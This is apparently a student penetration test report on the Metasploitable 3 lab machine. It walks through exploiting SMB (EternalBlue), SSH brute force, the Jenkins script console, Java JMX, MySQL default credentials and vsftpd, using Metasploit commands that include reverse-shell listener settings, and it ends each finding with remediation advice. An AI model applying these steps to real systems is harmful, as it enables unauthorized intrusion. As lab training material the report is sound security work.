Prepared by:

Reem Asiri

Hesham Khaled

Mansor Khaled

Sara Al Qahtani

EXECUTIVE SUMMARY

We performed a security assessment of Metasploitable 3. The penetration test simulated an attack from an external threat actor attempting to gain access to the system. The purpose of this assessment was to discover and identify vulnerabilities and suggest methods to remediate the vulnerabilities. We identified a vulnerabilities within the scope of the engagement which are broken down by severity in the table below.

HIGH	MEDIUM	LOW
4	2	–

The highest severity vulnerabilities give potential attackers the opportunity to a remote code execution (RCE) vulnerability in the SMB service. An attacker can exploit this vulnerability by sending a malicious request to the SMB service. This will cause malicious code to be executed on the target system, giving the attacker full control over the system. To ensure data confidentiality, integrity, and availability, security remediations should be implemented. 

Note that this assessment may not disclose all vulnerabilities that are present on the system within the scope. Any changes made to the environment during the period of testing may affect the results of the assessment.

SCOPE

The scope of this penetration test was to identify and assess vulnerabilities in the Metasploitable3 virtual machine. The Metasploitable3 virtual machine is a popular target for penetration testers, as it contains a variety of vulnerable systems and applications. The scope of this penetration test included the following:

• Network-level testing: This included scanning for open ports and vulnerabilities on the Metasploitable3 virtual machine.
• Host-level testing: This included testing for vulnerabilities in the operating systems and applications that are installed on the Metasploitable3 virtual machine. The scope of this penetration test did not include the following:
  • Physical security testing: This includes testing for vulnerabilities in physical security controls, such as physical access controls and environmental controls.
  • Social engineering testing: This includes testing for vulnerabilities in social engineering attacks, such as phishing and pretexting.
  • Compliance testing: This includes testing for compliance with specific security standards, such as PCI DSS and HIPAA.
• Methodology

The following methodology was used to conduct this penetration test:

• Information gathering: This included gathering information about the Metasploitable3 virtual machine, such as the IP addresses, domain names, and open ports.
• Vulnerability scanning: This included using automated tools to scan for vulnerabilities on the Metasploitable3 virtual machine.
• Penetration testing: This included using manual techniques to exploit vulnerabilities on the Metasploitable3 virtual machine.
• Reporting: This included documenting the findings of the penetration test and providing recommendations for remediation.

TESTING METHODOLOGY

Testing methodology was split into three phases: Reconnaissance, Target Assessment, and Execution of Vulnerabilities. During reconnaissance, we gathered information about system. We used port scanning and other enumeration methods to refine target information and assess target values. Next, we conducted our targeted assessment. We simulated an attacker exploiting vulnerabilities in the windows 7. We gathered evidence of vulnerabilities during this phase of the engagement while conducting the simulation in a manner that would not disrupt normal business operations.

The following image is a graphical representation of this methodology.

Figure 1

CLASSIFICATION DEFINITIONS

Risk Classifications

Level	Score	Description
Critical	10	The vulnerability poses an immediate threat to the organization. Successful exploitation may permanently affect the organization. Remediation should be immediately performed.
High	7-9	The vulnerability poses an urgent threat to the organization, and remediation should be prioritized.
Medium	4-6	Successful exploitation is possible and may result in notable disruption of business functionality. This vulnerability should be remediated when feasible.
Low	1-3	The vulnerability poses a negligible/minimal threat to the organization. The presence of this vulnerability should be noted and remediated if possible.
Informational	0	These findings have no clear threat to the organization, but may cause business processes to function differently than desired or reveal sensitive information about the company.

Exploitation Likelihood Classifications

Likelihood	Description
Likely	Exploitation methods are well-known and can be performed using publicly available tools. Low-skilled attackers and automated tools could successfully exploit the vulnerability with minimal difficulty.
Possible	Exploitation methods are well-known, may be performed using public tools, but require configuration. Understanding of the underlying system is required for successful exploitation.
Unlikely	Exploitation requires deep understanding of the underlying systems or advanced technical skills. Precise conditions may be required for successful exploitation.

Business Impact Classifications

Impact	Description
Major	Successful exploitation may result in large disruptions of critical business functions across the organization and significant financial damage.
Moderate	Successful exploitation may cause significant disruptions to non-critical business functions.
Minor	Successful exploitation may affect few users, without causing much disruption to routine business functions.

Remediation Difficulty Classifications

Difficulty	Description
Hard	Remediation may require extensive reconfiguration of underlying systems that is time consuming. Remediation may require disruption of normal business functions.
Moderate	Remediation may require minor reconfigurations or additions that may be time-intensive or expensive.
Easy	Remediation can be accomplished in a short amount of time, with little difficulty.

Gathering information

Is the first and most important step in the penetration test process. It includes collecting as much information as possible about the targeted system or network. This information will be used to identify vulnerabilities and plan attack vectors.

scan the IP address of the target using Nmap

The screenshot below shows ports numbers 139 and 445 were opened where it was running an SMB service, and there are possibilities of vulnerability.

SMB is used for file and printer sharing on Windows, so we can scan for the vulnerability available on port 445 by using NSE (Nmap Scripting Engine).

The screenshot below shows that port 445 is vulnerable to the remote code execution (ms17–010).

We searched for the ms17–010 exploit, and as a result we got a list of different exploits.

Use an auxiliary module to scan and make sure if the system vulnerable by ms17-010 or not?

The result shows that the system is infected with this vulnerability

 The following exploit has used successfully.

“exploit/windows/smb/ms17_010_eternalblue “

We use Command “show options” to fill the required configurations

The screenshot below shows successful exploitation and gain access to the Metasploit 3 system.

Here we have the authority to use the shell as a root in the targeted system

Recommendations

Way to avoid SMB exploitation and keep it secure against hackers

1. Keep the SMB service up to date with the latest version and that all updates and security patches are applied.
2. Disable the service if not in use.
3. Enable SMB encryption to ensure that data transmitted over the network is secure and protected from interception by hackers.
4. Implement firewalls to limit access to SMB traffic and block unauthorized access attempts.
5. Limit access to SMB shares to only those users who need it, and ensure that access is granted on a need-to-know basis.
6. Use strong authentication methods such as two-factor authentication to prevent unauthorized access to SMB shares.
7. Monitor network activity for unusual or suspicious activity, such as repeated attempts to access SMB shares, which could indicate a potential attack.

Another vulnerability is SSH is a type of cyberattack that targets the Secure Shell (SSH) protocol, which is used to securely access and manage remote servers. Attackers can use a variety of techniques to exploit vulnerabilities in SSH servers, such as brute-force attacks, phishing attacks, and man-in-the-middle attacks.

Now, I will use the brute-force attack. 

from the last Nmap we found the SSH port is open 

we need a dictionary file to execute the exploitation. 

To make a dictionary file, type the following command:

 cewl https://github.com/rapid7/metasploitable3/wiki -m 7 -d 0 –w JK.txt

CeWL is a command used to make a customized wordlist using a given URL. Using the above command will make a dictionary file of metasploitable3 and might help us find the  password.

This module will test SSH logins on a range of machines and report successful logins If you have loaded a database plug-in and connected to a database this module will record successful logins and hosts so you can track your access.

“show options” command to show the required configurations then fill it with the command set

(RHOSTS – RPORT – USERNAME – PASS_FILE – STOP_ON_SUCCESS – VERBOSE)

Use command exploit

Now, we can see that we have successful login into the targeted machine by brute-forcing attack

Shell session is opened

Recommendations

There are a number of things you can do to protect against SSH attacks, including:

• Use strong passwords: A strong password is at least eight characters long and includes a mix of upper and lowercase letters, numbers, and symbols.
• Use two-factor authentication: Two-factor authentication adds an extra layer of security by requiring you to enter a code from your phone or another device in addition to your password.
• Keep your SSH server software up to date: Software updates often include security patches that can fix vulnerabilities that attackers can exploit.
• Disable root login: The root account is the most powerful account on a Linux system, so it is a prime target for attackers. Disabling root login and using a different account with sudo privileges can help to protect your system from attack.
• Use SSH key authentication: SSH key authentication is a more secure way to authenticate to an SSH server than using passwords. With SSH key authentication, you generate a pair of keys: a public key and a private key. The public key is stored on the SSH server, and the private key is stored on your local computer. When you connect to the SSH server, you use your private key to authenticate yourself.

We conduct an intensive scan of the system again to search for available vulnerabilities that can be exploited.

It is possible to scan the open ports through the Metasploit tool after entering them through the command $ msfconsole -q

After checking, we found an open port with number 8484 . To find out what service related to this port, we checked by getting access to it from the browser with the IP address, 10,.0.2.7:8484

It opens a page for “Jenkins” which is a self-contained, open source automation server which can be used to automate all sorts of tasks related to building, testing, and delivering or deploying software.

Jenkins can be installed through native system packages, Docker, or even run standalone by any machine with a Java Runtime Environment (JRE) installed.

Through this service, we can browse the files inside it.

I noticed that you can access the sub-page under the name of the Manag Jenkins and it is possible to browse it

The console script has been accessed and you can write any command inside it, but I noticed that the commands are only in Groovy script. I searched the Internet and found a command that displays the network address. After the apparent result, it is proven that it is possible to penetrate through this port.

Use an exploit module“exploit/multi/http/jenkins_script_console”. To try to perform a penetration test.

msf6 exploit(multi/http/jenkins_script_console) > set RHOSTS 10.0.2.7

msf6 exploit(multi/http/jenkins_script_console) > set RPORT 8484

msf6 exploit(multi/http/jenkins_script_console) > set TARGETURI /script/

msf6 exploit(multi/http/jenkins_script_console) > set LHOST 10.0.2.100 “This Ip for kali”

msf6 exploit(multi/http/jenkins_script_console) > set LPORT 4444

msf6 exploit(multi/http/jenkins_script_console) > exploit

Now, we can see that we have successfully logged into the targeted machine.

We controlled the system by meterpreter. browsing files or controlling the system completely.

Recommendations

let’s see how you can secure your server a “Jenkins” :-

• Enable Jenkins’ security Jenkins global security is the first line of defense in protecting the asset it controls. Core Jenkins supports four security realms: delegate to servlet container, Jenkins’s own user database, LDAP, and Unix user/group database. The “Unix user/group database” option uses Unix’s PAM database to authenticate Jenkins users. This is useful for extending Jenkins users with Unix servers preconfigured with LDAP (see Nemeth, Hein, & Snyder, 2006). The best authentication method is LDAP because most organizations that use it enforces a 90-day password change. If the LDAP account gets compromised, an account lockout or password reset also protects the Jenkins system that benefits from it. The second part of selecting a security realm is the authorization method. Matrixbased security allows user permissions configuration at a global level. Project-based matrix authorization strategy extends matrix-based security by allowing security on a perjob basis. This option is beneficial for restricting access to jobs on a per group or user basis.

Enable the slave to master access control prevents the node from asking the master to do harmful things. For example, if the master needs to temporarily take control of a user’s machine to do a specific job, turn off this option if all nodes are under full control of the Jenkins master.

• Enable SSL encryption No matter how secure Jenkins security is, passwords get passed around as clear text without the Secure Sockets Layer (SSL). The remedy for passing around password in clear text is to use an SSL certificate.
• Use a web server or a Winstone configuration file.
• Disable CLI By default in when mitigating security risk for any computer system, you have to disable all the functionalities that are not essential for your systems to work. So, as we found that the Jenkins’ Groovy CLI is a security risk for Jenkins’ servers, and since one can manage his Jenkins’ server without using the Groovy CLI, you have to disable it by default.

Another vulnerability is JAVA RMI. It is an object-oriented Remote Procedure Call (RPC) mechanism available in most Java installations. Software developers can use the technology to make functions available over a network. 

After searching on the Internet, I discovered that this vulnerability is JAVA RMI

Use an exploit module“ exploit/multi/misc/java_jmx_server”, To try to perform a penetration test.

Use Show options then fill the required configurations using command set

msf6 exploit(multi/misc/java_jmx_server) > set RHOSTS 10.0.2.7

msf6 exploit(multi/misc/java_jmx_server) > set RPORT 1617

msf6 exploit(multi/misc/java_jmx_server) > set  LHOST 10.0.2.100

msf6 exploit(multi/misc/java_jmx_server) > set  LPORT 4444

use command exploit.

As you can see we have successful login into the targeted machine 

We can control the system by meterpreter. browsing files or controlling the system completely.

Recommendations

Improve the security of your RMI applications by following these recommendations:

• Follow Secure Coding Guidelines for Java SE.
• Always run a security manager when using RMI, either on a client or server. See The Security Manager in The Java Tutorials.
• Establish a reasonable security policy. For example, grant SocketPermission and allow listen, accept, connect, and resolve actions only among hosts communicating with RMI. Do not have the security policy grant AllPermission. See Permissions in the JDK and Default Policy Implementation and Policy File Syntax.
• If RMI is being used only for communication among JVMs on the local host, restrict communications to be local only. Accomplish this by specifying the appropriate socket permissions in the security policy file as described previously. Alternatively, you can use RMI APIs directly to restrict connections only to the local host. See an example of this in the documentation for the RMISocketFactory class.
• Ensure that the value of the java.rmi.server.useCodebaseOnly property is true (which is the default value). Setting this property to false enables remote code loading, which increases the level of security risk to the system. See java.rmi Properties.
• Run RMI over SSL/TLS, and require authentication for both server and client. For further information, see the following:
  • The SslRMIClientSocketFactory class
  • The SslRMIServerSocketFactory class
  • Using Java RMI with SSL
  • Java Secure Socket Extension (JSSE) Reference Guide
  • JSSE Sample Code

Another vulnerability is MySQL is a relational database management system (RDBMS) that is widely used in web applications. MySQL allows developers to store, manage, and retrieve data efficiently. However, MySQL is susceptible to a variety of vulnerabilities that can be exploited by attackers to gain unauthorized access to sensitive data or take control of the database server

I looked for  MySQL running service and their version on port 3306. I noticed that port 3306 is open and that there is a possibility of vulnerabilities.

It is possible to scan the open ports through the Metasploit tool after entering them through the command $ msfconsole -q

To determine the MySQL server version, I utilized the auxiliary module “auxiliary/scanner/mssql/mysql_version”

msf6 auxiliary(scanner/mysql/mysql_version) > set RHOSTS 192.168.8.107

msf6 auxiliary(scanner/mysql/mysql_version) > run

I conducted a comprehensive search for MySQL exploits and compiled a list of potential vulnerabilities. To initiate a penetration test, I employed the auxiliary module “auxiliary/scanner/mssql/mysql_login”

msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.8.107

msf6 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /home/kali/mysql_passwords.txt

msf6 auxiliary(scanner/mysql/mysql_login) > set USERPASS_FILE /home/kali/mysql_passwords.txt

msf6 auxiliary(scanner/mysql/mysql_login) > set USER_AS_PASS true

msf6 auxiliary(scanner/mysql/mysql_login) > run

Leveraging the default password database from the file “https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt”, it was discovered that the default password “root” remained unchanged, granting the attacker unauthorized access to the system.

We have now successfully established a connection with the target MySQL database

We can control the MySQL database, This includes browsing the database, executing queries, and creating or deleting tables.

Recommendations

To enhance the security of your MySQL applications, consider implementing these recommendations :

• Adhere to Secure Coding Guidelines for MySQL
  Employ secure coding practices to minimize the risk of introducing vulnerabilities into your MySQL applications.
• Enable MySQL Binary Logging:
  Activate MySQL binary logging to maintain a complete history of database changes, enabling recovery from potential attacks or data corruption.
• Implement Strong Password Policies:
  Enforce strong password policies for all MySQL accounts, mandating complex passwords with regular changes.
• Restrict Remote Access:
  Only allow remote access to MySQL from authorized sources, minimizing the attack surface.
• Enable MySQL Auditing:
  Enable MySQL auditing to track user activity and identify suspicious behavior.
• Utilize Least Privilege:
  Grant MySQL users only the minimum privileges necessary for their tasks, reducing the potential impact of compromised accounts.
• Regularly Update MySQL:
  Promptly apply MySQL security patches and updates to address newly discovered vulnerabilities.
• Perform Regular Security Scans:
  Conduct regular vulnerability scans of your MySQL infrastructure to identify and remediate potential security weaknesses.

The last vulnerability we used is vsftpd, which stands for Very Secure FTP Daemon. 

After running the Metasploit we check the available services on the targeted system by using the command: services -R 10.0.2.4

As you can see on the screenshot below the tcp port that has the vsftpd vulnerability is open.

We search for the possible exploits and find the one appeared on the screenshot

In this step we used the command show options and then filled the required configuration using the command set and show options again to make sure that it is successfully filled

Now we have successful login, and the shell session is opened with a root authority

Recommendations

Exploiting vulnerabilities in software, including VSFTPD 2.3.4, is illegal and unethical without proper authorization. However, understanding these vulnerabilities and their potential impact is essential for system administrators and security professionals.

To protect against exploitation, it is crucial to keep your software and systems up to date with the latest security patches. Consider using modern FTP server software that is actively maintained and designed with security in mind.

APPENDIX A – TOOLS USED

TOOL	DESCRIPTION
Metasploit	Used for exploitation of vulnerable services and vulnerability scanning.
Nmap	Used for scanning ports on hosts.
Cwel	Used for returns a list of words which can then be used for password crackers